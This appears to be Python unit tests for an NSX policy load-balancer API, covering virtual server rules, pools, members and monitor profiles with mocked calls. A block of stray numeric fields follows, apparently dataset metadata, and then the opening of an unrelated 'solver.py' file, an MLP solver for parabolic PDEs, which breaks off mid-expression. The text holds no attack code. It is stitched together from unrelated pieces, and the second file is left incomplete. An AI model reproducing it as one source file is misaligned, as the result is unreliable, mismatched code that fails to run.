result = self.resourceApi.get(obj_id, tenant=TEST_TENANT)
expected_def = lb_defs.LBVirtualServerDef(
virtual_server_id=obj_id,
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
self.assertEqual(obj_id, result['id'])
def test_get_by_name(self):
name = 'd1'
with mock.patch.object(
self.policy_api, "list",
return_value={'results': [{'display_name': name}]}) as api_call:
obj = self.resourceApi.get_by_name(name, tenant=TEST_TENANT)
self.assertIsNotNone(obj)
expected_def = lb_defs.LBVirtualServerDef(
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
def test_list(self):
with mock.patch.object(self.policy_api, "list",
return_value={'results': []}) as api_call:
result = self.resourceApi.list(tenant=TEST_TENANT)
expected_def = lb_defs.LBVirtualServerDef(
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
self.assertEqual([], result)
def test_update(self):
obj_id = '111'
name = 'new name'
description = 'new desc'
vs_name = 'name-name'
with self.mock_get(obj_id, vs_name), \
self.mock_create_update() as update_call:
self.resourceApi.update(obj_id,
name=name,
description=description,
tenant=TEST_TENANT)
expected_def = lb_defs.LBVirtualServerDef(
virtual_server_id=obj_id, name=name,
description=description,
tenant=TEST_TENANT)
self.assert_called_with_def(update_call, expected_def)
def test_update_log_parameters(self):
obj_id = '111'
name = 'new name'
description = 'new desc'
vs_name = 'name-name'
with self.mock_get(obj_id, vs_name), \
self.mock_create_update() as update_call:
self.resourceApi.update(obj_id,
name=name,
description=description,
tenant=TEST_TENANT,
access_log_enabled=True,
log_significant_event_only=True)
expected_def = lb_defs.LBVirtualServerDef(
nsx_version=nsx_constants.NSX_VERSION_3_0_0,
virtual_server_id=obj_id, name=name,
description=description,
tenant=TEST_TENANT, access_log_enabled=True,
log_significant_event_only=True)
self.assert_called_with_def(update_call, expected_def)
def test_log_parameters_for_version(self):
obj_id = '111'
name = 'new name'
description = 'new desc'
expected_def = lb_defs.LBVirtualServerDef(
nsx_version=nsx_constants.NSX_VERSION_2_5_0,
virtual_server_id=obj_id, name=name,
description=description,
tenant=TEST_TENANT, access_log_enabled=True,
log_significant_event_only=True)
self.assertFalse('access_log_enabled' in expected_def.get_obj_dict())
self.assertFalse('log_significant_event_only' in
expected_def.get_obj_dict())
expected_def = lb_defs.LBVirtualServerDef(
nsx_version=nsx_constants.NSX_VERSION_3_0_0,
virtual_server_id=obj_id, name=name,
description=description,
tenant=TEST_TENANT, access_log_enabled=True,
log_significant_event_only=True)
self.assertTrue('access_log_enabled' in expected_def.get_obj_dict())
self.assertTrue('log_significant_event_only' in
expected_def.get_obj_dict())
def test_non_partial_update(self):
obj_id = '111'
vs_name = 'name-name'
with self.mock_get(obj_id, vs_name, max_concurrent_connections=80), \
self.mock_create_update() as update_call:
self.resourceApi.update(obj_id,
max_concurrent_connections=None,
tenant=TEST_TENANT,
allow_partial_updates=False)
expected_def = lb_defs.LBVirtualServerDef(
virtual_server_id=obj_id, name=vs_name,
max_concurrent_connections=None,
tenant=TEST_TENANT)
update_call.assert_called_with(mock.ANY, partial_updates=False,
force=False)
self.assert_called_with_def(update_call, expected_def)
def test_add_lb_rule(self):
vs_obj_id = '111'
vs_name = 'name-name'
rule_actions = 'test1'
rule_match_conditions = 'test2'
rule_name = 'dummy_rule'
rule_match_strategy = 'test3'
rule_phase = 'test4'
with self.mock_get(vs_obj_id, vs_name), \
self.mock_create_update() as update_call:
self.resourceApi.add_lb_rule(
vs_obj_id, actions=rule_actions, name=rule_name,
match_conditions=rule_match_conditions,
match_strategy=rule_match_strategy, phase=rule_phase)
lb_rule = lb_defs.LBRuleDef(
rule_actions, rule_match_conditions, rule_name,
rule_match_strategy, rule_phase)
expected_def = lb_defs.LBVirtualServerDef(
virtual_server_id=vs_obj_id,
rules=[lb_rule])
self.assert_called_with_def(update_call, expected_def)
def test_add_lb_rule_first(self):
vs_obj_id = '111'
vs_name = 'name-name'
rule_actions = 'test1'
rule_match_conditions = 'test2'
rule_name = 'dummy_rule'
rule_match_strategy = 'test3'
rule_phase = 'test4'
with self.mock_get(vs_obj_id, vs_name,
rules=[{'display_name': 'xx'},
{'display_name': 'yy'}]), \
self.mock_create_update() as update_call:
self.resourceApi.add_lb_rule(
vs_obj_id, actions=rule_actions, name=rule_name,
match_conditions=rule_match_conditions,
match_strategy=rule_match_strategy, phase=rule_phase,
position=0)
lb_rule = lb_defs.LBRuleDef(
rule_actions, rule_match_conditions, rule_name,
rule_match_strategy, rule_phase)
expected_def = lb_defs.LBVirtualServerDef(
virtual_server_id=vs_obj_id,
rules=[lb_rule,
{'display_name': 'xx'},
{'display_name': 'yy'}])
self.assert_called_with_def(update_call, expected_def)
def test_add_lb_rule_last(self):
vs_obj_id = '111'
vs_name = 'name-name'
rule_actions = 'test1'
rule_match_conditions = 'test2'
rule_name = 'dummy_rule'
rule_match_strategy = 'test3'
rule_phase = 'test4'
with self.mock_get(vs_obj_id, vs_name,
rules=[{'display_name': 'xx'},
{'display_name': 'yy'}]), \
self.mock_create_update() as update_call:
self.resourceApi.add_lb_rule(
vs_obj_id, actions=rule_actions, name=rule_name,
match_conditions=rule_match_conditions,
match_strategy=rule_match_strategy, phase=rule_phase)
lb_rule = lb_defs.LBRuleDef(
rule_actions, rule_match_conditions, rule_name,
rule_match_strategy, rule_phase)
expected_def = lb_defs.LBVirtualServerDef(
virtual_server_id=vs_obj_id,
rules=[{'display_name': 'xx'},
{'display_name': 'yy'},
lb_rule])
self.assert_called_with_def(update_call, expected_def)
def test_add_lb_rule_last_over(self):
vs_obj_id = '111'
vs_name = 'name-name'
rule_actions = 'test1'
rule_match_conditions = 'test2'
rule_name = 'dummy_rule'
rule_match_strategy = 'test3'
rule_phase = 'test4'
with self.mock_get(vs_obj_id, vs_name,
rules=[{'display_name': 'xx'},
{'display_name': 'yy'}]), \
self.mock_create_update() as update_call:
self.resourceApi.add_lb_rule(
vs_obj_id, actions=rule_actions, name=rule_name,
match_conditions=rule_match_conditions,
match_strategy=rule_match_strategy, phase=rule_phase,
position=999)
lb_rule = lb_defs.LBRuleDef(
rule_actions, rule_match_conditions, rule_name,
rule_match_strategy, rule_phase)
expected_def = lb_defs.LBVirtualServerDef(
virtual_server_id=vs_obj_id,
rules=[{'display_name': 'xx'},
{'display_name': 'yy'},
lb_rule])
self.assert_called_with_def(update_call, expected_def)
def test_add_lb_rule_mid(self):
vs_obj_id = '111'
vs_name = 'name-name'
rule_actions = 'test1'
rule_match_conditions = 'test2'
rule_name = 'dummy_rule'
rule_match_strategy = 'test3'
rule_phase = 'test4'
with self.mock_get(vs_obj_id, vs_name,
rules=[{'display_name': 'xx'},
{'display_name': 'yy'}]), \
self.mock_create_update() as update_call:
self.resourceApi.add_lb_rule(
vs_obj_id, actions=rule_actions, name=rule_name,
match_conditions=rule_match_conditions,
match_strategy=rule_match_strategy, phase=rule_phase,
position=1)
lb_rule = lb_defs.LBRuleDef(
rule_actions, rule_match_conditions, rule_name,
rule_match_strategy, rule_phase)
expected_def = lb_defs.LBVirtualServerDef(
virtual_server_id=vs_obj_id,
rules=[{'display_name': 'xx'},
lb_rule,
{'display_name': 'yy'}])
self.assert_called_with_def(update_call, expected_def)
def test_update_lb_rule(self):
vs_obj_id = '111'
vs_name = 'name-name'
with self.mock_get(
vs_obj_id, vs_name,
rules=[{'display_name': 'xx', 'actions': '11'},
{'display_name': 'yy'}]), \
self.mock_create_update() as update_call:
self.resourceApi.update_lb_rule(vs_obj_id, 'xx', actions='22')
expected_def = lb_defs.LBVirtualServerDef(
virtual_server_id=vs_obj_id,
rules=[{'display_name': 'xx', 'actions': '22'},
{'display_name': 'yy'}])
self.assert_called_with_def(update_call, expected_def)
def test_update_lb_rule_position(self):
vs_obj_id = '111'
vs_name = 'name-name'
with self.mock_get(
vs_obj_id, vs_name,
rules=[{'display_name': 'xx', 'actions': '11'},
{'display_name': 'yy'}]), \
self.mock_create_update() as update_call:
self.resourceApi.update_lb_rule(vs_obj_id, 'xx', actions='22',
position=1)
expected_def = lb_defs.LBVirtualServerDef(
virtual_server_id=vs_obj_id,
rules=[{'display_name': 'yy'},
{'display_name': 'xx', 'actions': '22'}])
self.assert_called_with_def(update_call, expected_def)
def test_update_lb_rule_suffix(self):
vs_obj_id = '111'
vs_name = 'name-name'
with self.mock_get(
vs_obj_id, vs_name,
rules=[{'display_name': 'xx_with_suffix', 'actions': '11'},
{'display_name': 'yy'}]), \
self.mock_create_update() as update_call:
self.resourceApi.update_lb_rule(
vs_obj_id, 'xx', actions='22',
compare_name_suffix='suffix')
expected_def = lb_defs.LBVirtualServerDef(
virtual_server_id=vs_obj_id,
rules=[{'display_name': 'xx', 'actions': '22'},
{'display_name': 'yy'}])
self.assert_called_with_def(update_call, expected_def)
def test_update_lb_rule_wrong_suffix(self):
vs_obj_id = '111'
vs_name = 'name-name'
with self.mock_get(
vs_obj_id, vs_name,
rules=[{'display_name': 'xx_with_suffix', 'actions': '11'},
{'display_name': 'yy'}]):
self.assertRaises(nsxlib_exc.ResourceNotFound,
self.resourceApi.update_lb_rule,
vs_obj_id, 'xx', actions='22',
compare_name_suffix='bad')
def test_remove_lb_rule(self):
vs_obj_id = '111'
vs_name = 'name-name'
with self.mock_get(vs_obj_id, vs_name,
rules=[{'display_name': 'xx'},
{'display_name': 'yy'}]), \
self.mock_create_update() as update_call:
self.resourceApi.remove_lb_rule(vs_obj_id, 'xx')
expected_def = lb_defs.LBVirtualServerDef(
virtual_server_id=vs_obj_id,
rules=[{'display_name': 'yy'}])
self.assert_called_with_def(update_call, expected_def)
def test_remove_lb_rule_by_suffix(self):
vs_obj_id = '111'
vs_name = 'name-name'
with self.mock_get(vs_obj_id, vs_name,
rules=[{'display_name': 'xx_with_suffix'},
{'display_name': 'yy'}]), \
self.mock_create_update() as update_call:
self.resourceApi.remove_lb_rule(vs_obj_id, 'with_suffix',
check_name_suffix=True)
expected_def = lb_defs.LBVirtualServerDef(
virtual_server_id=vs_obj_id,
rules=[{'display_name': 'yy'}])
self.assert_called_with_def(update_call, expected_def)
def test_remove_lb_rule_wrong_suffix(self):
vs_obj_id = '111'
vs_name = 'name-name'
with self.mock_get(vs_obj_id, vs_name,
rules=[{'display_name': 'xx_with_suffix'},
{'display_name': 'yy'}]),\
self.mock_create_update() as update_call:
self.resourceApi.remove_lb_rule(vs_obj_id, 'wrong_suffiX',
check_name_suffix=True)
expected_def = lb_defs.LBVirtualServerDef(
virtual_server_id=vs_obj_id,
rules=[{'display_name': 'xx_with_suffix'},
{'display_name': 'yy'}])
self.assert_called_with_def(update_call, expected_def)
def test_build_access_list_control(self):
lb_acl = self.resourceApi.build_access_list_control(
constants.ACTION_ALLOW, 'fake_group_path', True)
expected_acl_dict = {
'action': constants.ACTION_ALLOW,
'enabled': True,
'group_path': 'fake_group_path'
}
self.assertDictEqual(lb_acl.get_obj_dict(), expected_acl_dict)
def test_wait_until_realized_fail(self):
vs_id = 'test_vs'
info = {'state': constants.STATE_UNREALIZED,
'realization_specific_identifier': vs_id}
with mock.patch.object(self.resourceApi, "_get_realization_info",
return_value=info):
self.assertRaises(nsxlib_exc.RealizationTimeoutError,
self.resourceApi.wait_until_realized,
vs_id, max_attempts=5, sleep=0.1,
tenant=TEST_TENANT)
def test_wait_until_realized_succeed(self):
vs_id = 'test_vs'
info = {'state': constants.STATE_REALIZED,
'realization_specific_identifier': vs_id,
'entity_type': 'LbVirtualServerDto'}
with mock.patch.object(self.resourceApi, "_get_realization_info",
return_value=info):
actual_info = self.resourceApi.wait_until_realized(
vs_id, entity_type='LbVirtualServerDto', max_attempts=5,
sleep=0.1, tenant=TEST_TENANT)
self.assertEqual(info, actual_info)
def test_remove_virtual_server_client_ssl_profile_binding(self):
vs_id = 'test-id'
vs_name = 'test-name'
client_binding = {
'default_certificate_path': '/infra/certificates/test-cert',
'client_ssl_profile_path': '/infra/lb-client-ssl-profiles/default'}
server_binding = {
'ssl_profile_path': '/infra/lb-server-ssl-profiles/test'}
with self.mock_get(
vs_id, vs_name, client_ssl_profile_binding=client_binding,
server_ssl_profile_binding=server_binding), \
self.mock_create_update() as update_call:
self.resourceApi.remove_virtual_server_client_ssl_profile_binding(
vs_id)
expected_def = lb_defs.LBVirtualServerDef(
virtual_server_id=vs_id, name=vs_name)
self.assert_called_with_def(update_call, expected_def)
def test_remove_dlb_virtual_server_persistence_profile(self):
vs_id = 'test-id'
vs_name = 'test-name'
with self.mock_get(
vs_id, vs_name, lb_persistence_profile_path='test-profile'), \
self.mock_create_update() as update_call:
self.resourceApi.remove_dlb_virtual_server_persistence_profile(
vs_id)
expected_def = lb_defs.LBVirtualServerDef(
virtual_server_id=vs_id, name=vs_name)
self.assert_called_with_def(update_call, expected_def)
class TestPolicyLBPoolApi(test_resources.NsxPolicyLibTestCase):
def setUp(self, *args, **kwargs):
super(TestPolicyLBPoolApi, self).setUp()
self.resourceApi = self.policy_lib.load_balancer.lb_pool
def test_create_with_id(self):
name = 'd1'
description = 'desc'
obj_id = '111'
members = [
lb_defs.LBPoolMemberDef(ip_address='10.0.0.1')]
algorithm = 'algo'
active_monitor_paths = 'path1'
member_group = 'group1'
snat_translation = False
with mock.patch.object(self.policy_api,
"create_or_update") as api_call:
result = self.resourceApi.create_or_overwrite(
name,
lb_pool_id=obj_id,
description=description,
members=members,
active_monitor_paths=active_monitor_paths,
algorithm=algorithm,
member_group=member_group,
snat_translation=snat_translation,
tcp_multiplexing_enabled=True,
tcp_multiplexing_number=10,
tenant=TEST_TENANT)
expected_def = lb_defs.LBPoolDef(
lb_pool_id=obj_id,
name=name,
description=description,
members=members,
active_monitor_paths=active_monitor_paths,
algorithm=algorithm,
member_group=member_group,
snat_translation=snat_translation,
tcp_multiplexing_enabled=True,
tcp_multiplexing_number=10,
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
self.assertEqual(obj_id, result)
def test_create_without_id(self):
name = 'd1'
description = 'desc'
with mock.patch.object(self.policy_api,
"create_or_update") as api_call:
result = self.resourceApi.create_or_overwrite(
name, description=description,
tenant=TEST_TENANT)
expected_def = lb_defs.LBPoolDef(
lb_pool_id=mock.ANY,
name=name,
description=description,
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
self.assertIsNotNone(result)
def test_create_with_retry_stale_revision(self):
name = 'd1'
description = 'desc'
obj_id = '111'
members = [
lb_defs.LBPoolMemberDef(ip_address='10.0.0.1')]
algorithm = 'algo'
active_monitor_paths = 'path1'
member_group = 'group1'
snat_translation = False
with mock.patch.object(self.policy_api, "create_or_update",
side_effect=nsxlib_exc.StaleRevision
) as api_call:
with self.assertRaises(nsxlib_exc.StaleRevision):
self.resourceApi.create_or_overwrite(
name,
lb_pool_id=obj_id,
description=description,
members=members,
active_monitor_paths=active_monitor_paths,
algorithm=algorithm,
member_group=member_group,
snat_translation=snat_translation,
tenant=TEST_TENANT)
self.assertEqual(nsxlib_testcase.NSX_MAX_ATTEMPTS,
api_call.call_count)
def test_create_with_retry_pending_delete(self):
name = 'd1'
description = 'desc'
obj_id = '111'
members = [
lb_defs.LBPoolMemberDef(ip_address='10.0.0.1')]
algorithm = 'algo'
active_monitor_paths = 'path1'
member_group = 'group1'
snat_translation = False
with mock.patch.object(self.policy_api, "create_or_update",
side_effect=nsxlib_exc.NsxPendingDelete
) as api_call:
with self.assertRaises(nsxlib_exc.NsxPendingDelete):
self.resourceApi.create_or_overwrite(
name,
lb_pool_id=obj_id,
description=description,
members=members,
active_monitor_paths=active_monitor_paths,
algorithm=algorithm,
member_group=member_group,
snat_translation=snat_translation,
tenant=TEST_TENANT)
self.assertEqual(nsxlib_testcase.NSX_MAX_ATTEMPTS,
api_call.call_count)
def test_delete(self):
obj_id = '111'
with mock.patch.object(self.policy_api, "delete") as api_call:
self.resourceApi.delete(obj_id, tenant=TEST_TENANT)
expected_def = lb_defs.LBPoolDef(
lb_pool_id=obj_id,
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
def test_get(self):
obj_id = '111'
with mock.patch.object(self.policy_api, "get",
return_value={'id': obj_id}) as api_call:
result = self.resourceApi.get(obj_id, tenant=TEST_TENANT)
expected_def = lb_defs.LBPoolDef(
lb_pool_id=obj_id,
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
self.assertEqual(obj_id, result['id'])
def test_get_by_name(self):
name = 'd1'
with mock.patch.object(
self.policy_api, "list",
return_value={'results': [{'display_name': name}]}) as api_call:
obj = self.resourceApi.get_by_name(name, tenant=TEST_TENANT)
self.assertIsNotNone(obj)
expected_def = lb_defs.LBPoolDef(
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
def test_list(self):
with mock.patch.object(self.policy_api, "list",
return_value={'results': []}) as api_call:
result = self.resourceApi.list(tenant=TEST_TENANT)
expected_def = lb_defs.LBPoolDef(
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
self.assertEqual([], result)
def test_update(self):
obj_id = '111'
name = 'new name'
description = 'new desc'
members = [{'ip_address': '10.0.0.1'}]
algorithm = 'algo'
active_monitor_paths = ['path1']
member_group = 'group1'
snat_translation = False
with mock.patch.object(self.policy_api, "get",
return_value={'id': obj_id}), \
mock.patch.object(self.policy_api,
"create_or_update") as update_call:
self.resourceApi.update(obj_id,
name=name,
description=description,
members=members,
active_monitor_paths=active_monitor_paths,
algorithm=algorithm,
member_group=member_group,
snat_translation=snat_translation,
tcp_multiplexing_enabled=True,
tcp_multiplexing_number=10,
tenant=TEST_TENANT)
expected_def = lb_defs.LBPoolDef(
lb_pool_id=obj_id,
name=name,
description=description,
members=members,
active_monitor_paths=active_monitor_paths,
algorithm=algorithm,
member_group=member_group,
snat_translation=snat_translation,
tcp_multiplexing_enabled=True,
tcp_multiplexing_number=10,
tenant=TEST_TENANT)
self.assert_called_with_def(update_call, expected_def)
def test_update_without_partial_patch(self):
obj_id = '111'
name = 'new name'
description = 'new desc'
members = [{'ip_address': '10.0.0.1'}]
algorithm = 'algo'
active_monitor_paths = ['path1']
member_group = 'group1'
snat_translation = False
with mock.patch.object(self.policy_api, "get",
return_value={'id': obj_id}), \
mock.patch.object(self.policy_api,
"create_or_update") as update_call:
self.resourceApi.update(obj_id,
name=name,
description=description,
members=members,
active_monitor_paths=active_monitor_paths,
algorithm=algorithm,
member_group=member_group,
snat_translation=snat_translation,
tenant=TEST_TENANT,
allow_partial_updates=False)
expected_def = lb_defs.LBPoolDef(
lb_pool_id=obj_id,
name=name,
description=description,
members=members,
active_monitor_paths=active_monitor_paths,
algorithm=algorithm,
member_group=member_group,
snat_translation=snat_translation,
tenant=TEST_TENANT)
update_call.assert_called_with(mock.ANY, partial_updates=False,
force=False)
self.assert_called_with_def(update_call, expected_def)
def test_add_monitor_to_pool(self):
obj_id = '111'
active_monitor_paths = ['path1']
with mock.patch.object(self.policy_api, "get",
return_value={'id': obj_id}), \
mock.patch.object(self.policy_api,
"create_or_update") as update_call:
self.resourceApi.add_monitor_to_pool(
obj_id,
active_monitor_paths,
tenant=TEST_TENANT)
expected_def = lb_defs.LBPoolDef(
lb_pool_id=obj_id,
active_monitor_paths=active_monitor_paths,
tenant=TEST_TENANT)
self.assert_called_with_def(update_call, expected_def)
def test_remove_monitor_from_pool(self):
obj_id = '111'
removed_monitor_path = 'path1'
stay_monitor_path = 'path2'
active_monitors = [removed_monitor_path, stay_monitor_path]
with mock.patch.object(
self.policy_api, "get", return_value={
'id': obj_id, 'active_monitor_paths': active_monitors}), \
mock.patch.object(self.policy_api,
"create_or_update") as update_call:
self.resourceApi.remove_monitor_from_pool(
obj_id,
removed_monitor_path,
tenant=TEST_TENANT)
expected_def = lb_defs.LBPoolDef(
lb_pool_id=obj_id,
active_monitor_paths=[stay_monitor_path],
tenant=TEST_TENANT)
self.assert_called_with_def(update_call, expected_def)
def test_create_pool_member_and_add_to_pool(self):
obj_id = '111'
ip_address = '1.1.1.1'
with mock.patch.object(self.policy_api, "get",
return_value={'id': obj_id}), \
mock.patch.object(self.policy_api,
"create_or_update") as update_call:
self.resourceApi.create_pool_member_and_add_to_pool(
obj_id, ip_address,
tenant=TEST_TENANT)
mem_def = lb_defs.LBPoolMemberDef(ip_address)
expected_def = lb_defs.LBPoolDef(
lb_pool_id=obj_id,
members=[mem_def],
tenant=TEST_TENANT)
self.assert_called_with_def(update_call, expected_def)
def test_update_pool_member(self):
obj_id = '111'
ip_address = '1.1.1.1'
port = '80'
new_name = 'mem1'
member = {'ip_address': ip_address, 'port': port,
'backup_member': True}
with mock.patch.object(self.policy_api, "get",
return_value={'id': obj_id,
'members': [member]}), \
mock.patch.object(self.policy_api,
"create_or_update") as update_call:
self.resourceApi.update_pool_member(
obj_id, ip_address, port=port, display_name=new_name,
backup_member=False, tenant=TEST_TENANT)
new_member = copy.copy(member)
new_member['display_name'] = new_name
new_member['backup_member'] = False
expected_def = lb_defs.LBPoolDef(
lb_pool_id=obj_id,
members=[new_member],
tenant=TEST_TENANT)
self.assert_called_with_def(update_call, expected_def)
def test_wait_until_realized_fail(self):
pool_id = 'test_pool'
info = {'state': constants.STATE_UNREALIZED,
'realization_specific_identifier': pool_id}
with mock.patch.object(self.resourceApi, "_get_realization_info",
return_value=info):
self.assertRaises(nsxlib_exc.RealizationTimeoutError,
self.resourceApi.wait_until_realized,
pool_id, max_attempts=5, sleep=0.1,
tenant=TEST_TENANT)
def test_wait_until_realized_succeed(self):
pool_id = 'test_pool'
info = {'state': constants.STATE_REALIZED,
'realization_specific_identifier': pool_id,
'entity_type': 'LbPoolDto'}
with mock.patch.object(self.resourceApi, "_get_realization_info",
return_value=info):
actual_info = self.resourceApi.wait_until_realized(
pool_id, entity_type='LbPoolDto', max_attempts=5,
sleep=0.1, tenant=TEST_TENANT)
self.assertEqual(info, actual_info)
class TestPolicyLBMonitorProfileHttpApi(test_resources.NsxPolicyLibTestCase):
def setUp(self, *args, **kwargs):
super(TestPolicyLBMonitorProfileHttpApi, self).setUp()
self.resourceApi = (
self.policy_lib.load_balancer.lb_monitor_profile_http)
self.obj_def = lb_defs.LBHttpMonitorProfileDef
def test_create_with_id(self):
name = 'd1'
obj_id = '111'
with mock.patch.object(self.policy_api,
"create_or_update") as api_call:
result = self.resourceApi.create_or_overwrite(
lb_monitor_profile_id=obj_id,
name=name,
tenant=TEST_TENANT)
expected_def = self.obj_def(
lb_monitor_profile_id=obj_id,
name=name,
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
self.assertEqual(obj_id, result)
def test_create_without_id(self):
name = 'd1'
with mock.patch.object(self.policy_api,
"create_or_update") as api_call:
result = self.resourceApi.create_or_overwrite(
name=name,
tenant=TEST_TENANT)
expected_def = self.obj_def(
lb_monitor_profile_id=mock.ANY,
name=name,
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
self.assertIsNotNone(result)
def test_delete(self):
obj_id = '111'
with mock.patch.object(self.policy_api, "delete") as api_call:
self.resourceApi.delete(obj_id, tenant=TEST_TENANT)
expected_def = self.obj_def(
lb_monitor_profile_id=obj_id,
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
def test_get(self):
obj_id = '111'
with mock.patch.object(self.policy_api, "get",
return_value={'id': obj_id}) as api_call:
result = self.resourceApi.get(obj_id, tenant=TEST_TENANT)
expected_def = self.obj_def(
lb_monitor_profile_id=obj_id,
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
self.assertEqual(obj_id, result['id'])
def test_get_by_name(self):
name = 'd1'
with mock.patch.object(
self.policy_api, "list",
return_value={'results': [{'display_name': name}]}) as api_call:
obj = self.resourceApi.get_by_name(name, tenant=TEST_TENANT)
self.assertIsNotNone(obj)
expected_def = self.obj_def(
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
def test_list(self):
with mock.patch.object(self.policy_api, "list",
return_value={'results': []}) as api_call:
result = self.resourceApi.list(tenant=TEST_TENANT)
expected_def = self.obj_def(
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
self.assertEqual([], result)
def test_update(self):
obj_id = '111'
name = 'new name'
with self.mock_get(obj_id, name), \
self.mock_create_update() as update_call:
self.resourceApi.update(obj_id,
name=name,
tenant=TEST_TENANT)
expected_def = self.obj_def(
lb_monitor_profile_id=obj_id,
name=name,
tenant=TEST_TENANT)
self.assert_called_with_def(update_call, expected_def)
class TestPolicyLBMonitorProfileHttpsApi(TestPolicyLBMonitorProfileHttpApi):
def setUp(self, *args, **kwargs):
super(TestPolicyLBMonitorProfileHttpsApi, self).setUp()
self.resourceApi = (
self.policy_lib.load_balancer.lb_monitor_profile_https)
self.obj_def = lb_defs.LBHttpsMonitorProfileDef
class TestPolicyLBMonitorProfileUdpApi(TestPolicyLBMonitorProfileHttpApi):
def setUp(self, *args, **kwargs):
super(TestPolicyLBMonitorProfileUdpApi, self).setUp()
self.resourceApi = (
self.policy_lib.load_balancer.lb_monitor_profile_udp)
self.obj_def = lb_defs.LBUdpMonitorProfileDef
class TestPolicyLBMonitorProfileIcmpApi(TestPolicyLBMonitorProfileHttpApi):
def setUp(self, *args, **kwargs):
super(TestPolicyLBMonitorProfileIcmpApi, self).setUp()
self.resourceApi = (
self.policy_lib.load_balancer.lb_monitor_profile_icmp)
self.obj_def = lb_defs.LBIcmpMonitorProfileDef
class TestPolicyLBMonitorProfileTcpApi(TestPolicyLBMonitorProfileHttpApi):
def setUp(self, *args, **kwargs):
super(TestPolicyLBMonitorProfileTcpApi, self).setUp()
self.resourceApi = (
self.policy_lib.load_balancer.lb_monitor_profile_tcp)
self.obj_def = lb_defs.LBTcpMonitorProfileDef
| 42.733233
| 79
| 0.574495
| 8,989
| 85,381
| 5.091668
| 0.043943
| 0.02742
| 0.062226
| 0.041513
| 0.900872
| 0.88112
| 0.873408
| 0.849767
| 0.833097
| 0.805523
| 0
| 0.00797
| 0.343109
| 85,381
| 1,997
| 80
| 42.754632
| 0.80808
| 0.006992
| 0
| 0.827222
| 0
| 0
| 0.059044
| 0.012882
| 0
| 0
| 0
| 0
| 0.098333
| 1
| 0.072778
| false
| 0
| 0.004444
| 0
| 0.085
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
837ab812280828bce0a9d700540813ff60bfb218
| 41,910
|
py
|
Python
|
solver.py
|
philipschw/mlpSolver
|
2f499b8fce0ec368dc2e76c633bab8c425db3982
|
[
"MIT"
] | 1
|
2021-12-21T20:09:59.000Z
|
2021-12-21T20:09:59.000Z
|
solver.py
|
philipschw/mlpSolver
|
2f499b8fce0ec368dc2e76c633bab8c425db3982
|
[
"MIT"
] | null | null | null |
solver.py
|
philipschw/mlpSolver
|
2f499b8fce0ec368dc2e76c633bab8c425db3982
|
[
"MIT"
] | null | null | null |
import logging
import os
import time
import numpy as np
import multiprocessing
try:
from generateSamples import load_mlp_generateSamples
except ModuleNotFoundError:
pass
class MLPSolver(object):
"""The MLP approximation algorithm for semilinear parabolic PDEs."""
def __init__(self, config, mlp):
"""
Constructor for the MLPSolver class
Parameters
---------
config: dict
Dict from the configuration file of the PDE under consideration
mlp: Equation class object
Class equation object (definition of the terminal function, nonlinearity f,
and associated SDE approximation) of the PDE of interest
"""
self.eqn_config = config.eqn_config
self.eval_config = config.eval_config
self.mlp = mlp
self.multiprocess = True if(self.eval_config.multiprocess) else False
def train(self, samples=None):
"""
Computes realizations of the MLP approximation algorithm.
Parameters
---------
samples: dict
Dict of the pre-generated samples in advanced mode from generateSamples.py
"""
start_train_time = time.time()
training_history = []
# begin mlp iterations (different realizations)
for theta in range(1,self.eval_config.num_realization + 1):
start_realization_time = time.time()
if(self.eqn_config.gradient_dependent):
if samples == None:
sol = (self.mlp_call_grad(self.mlp.f,
self.mlp.g,
self.mlp.dXsample,
self.mlp.dIsample,
self.mlp.num_iteration,
self.mlp.num_iteration,
self.mlp.x_init,
self.mlp.start_time,
self.multiprocess,
[samples, (self.mlp.num_iteration,), 0])[:,0])
else:
sol = (self.mlp_call_grad(self.mlp.f,
self.mlp.g,
self.mlp.dXsample,
self.mlp.dIsample,
self.mlp.num_iteration,
self.mlp.num_iteration,
self.mlp.x_init,
self.mlp.start_time,
self.multiprocess,
[samples[theta], (self.mlp.num_iteration,), 0])[:,0])
else:
if samples == None:
sol = (self.mlp_call(self.mlp.f,
self.mlp.g,
self.mlp.dXsample,
self.mlp.num_iteration,
self.mlp.num_iteration,
self.mlp.x_init,
self.mlp.start_time,
self.multiprocess,
[samples, (self.mlp.num_iteration,), 0]))
else:
sol = (self.mlp_call(self.mlp.f,
self.mlp.g,
self.mlp.dXsample,
self.mlp.num_iteration,
self.mlp.num_iteration,
self.mlp.x_init,
self.mlp.start_time,
self.multiprocess,
[samples[theta], (self.mlp.num_iteration,), 0]))
elapsed_time = time.time() - start_realization_time
cost = self.costEval(samples, theta)
training_history.append([theta, sol, elapsed_time, cost])
if self.eval_config.verbose:
logging.info("Realization: %d, Solution: %s, Elapsed Time: %f, Cost#RV: %s" % (theta, sol, elapsed_time, cost))
overall_elapsed_time = time.time() - start_train_time
logging.info("Overall Elapsed Time %f" % overall_elapsed_time)
return np.array(self.MLPlogging(training_history, samples))
def errors(self, realization_sol):
"""
Computes the L1 error, relative L1 error, L2 error, and relative L2 error for an given set of realizations
Parameters
---------
realization_sol: np.ndarray
Contains the solutions of different realizations
Returns
-------
L1 error, relative L1 error, L2 error, and relative L2 error for realization_sol
with respect to the reference solution in self.eval_config
"""
diff = (np.stack(realization_sol, axis=0)
